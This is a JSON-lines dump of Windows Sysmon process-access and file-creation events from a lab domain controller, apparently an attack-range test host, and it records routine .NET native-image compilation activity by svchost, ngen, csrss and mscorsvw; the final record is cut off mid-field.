{"EventTime":"2020-08-01 05:59:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7610,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:44.731\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04D0-5F25-0000-001061001100}\r\nTargetProcessId: 2836\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:44.731","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04D0-5F25-0000-001061001100}","TargetProcessId":"2836","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7611,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:44.778\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04D0-5F25-0000-0010B1031100}\r\nTargetProcessId: 2460\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:44.778","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04D0-5F25-0000-0010B1031100}","TargetProcessId":"2460","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7612,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:44.778\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04D0-5F25-0000-0010B1031100}\r\nTargetProcessId: 2460\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:44.778","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04D0-5F25-0000-0010B1031100}","TargetProcessId":"2460","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:59:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7613,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:44.778\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04D0-5F25-0000-0010B1031100}\r\nTargetProcessId: 2460\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:44.778","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04D0-5F25-0000-0010B1031100}","TargetProcessId":"2460","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7614,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:59:44.950\r\nProcessGuid: {A837DB8D-04D0-5F25-0000-0010B1031100}\r\nProcessId: 2460\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\99c-0\\System.Runtime.Caching.dll\r\nCreationUtcTime: 2020-08-01 05:59:44.950","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:59:44.950","ProcessGuid":"{A837DB8D-04D0-5F25-0000-0010B1031100}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\99c-0\\System.Runtime.Caching.dll","CreationUtcTime":"2020-08-01 05:59:44.950","EventReceivedTime":"2020-08-01 05:59:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7615,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:44.981\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04D0-5F25-0000-001053071100}\r\nTargetProcessId: 4660\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:44.981","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04D0-5F25-0000-001053071100}","TargetProcessId":"4660","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7616,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:44.981\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04D0-5F25-0000-001053071100}\r\nTargetProcessId: 4660\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:44.981","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04D0-5F25-0000-001053071100}","TargetProcessId":"4660","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:59:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7617,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:44.996\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04D0-5F25-0000-001053071100}\r\nTargetProcessId: 4660\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:44.996","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04D0-5F25-0000-001053071100}","TargetProcessId":"4660","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7618,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:45.059\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04D1-5F25-0000-00101E0B1100}\r\nTargetProcessId: 672\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 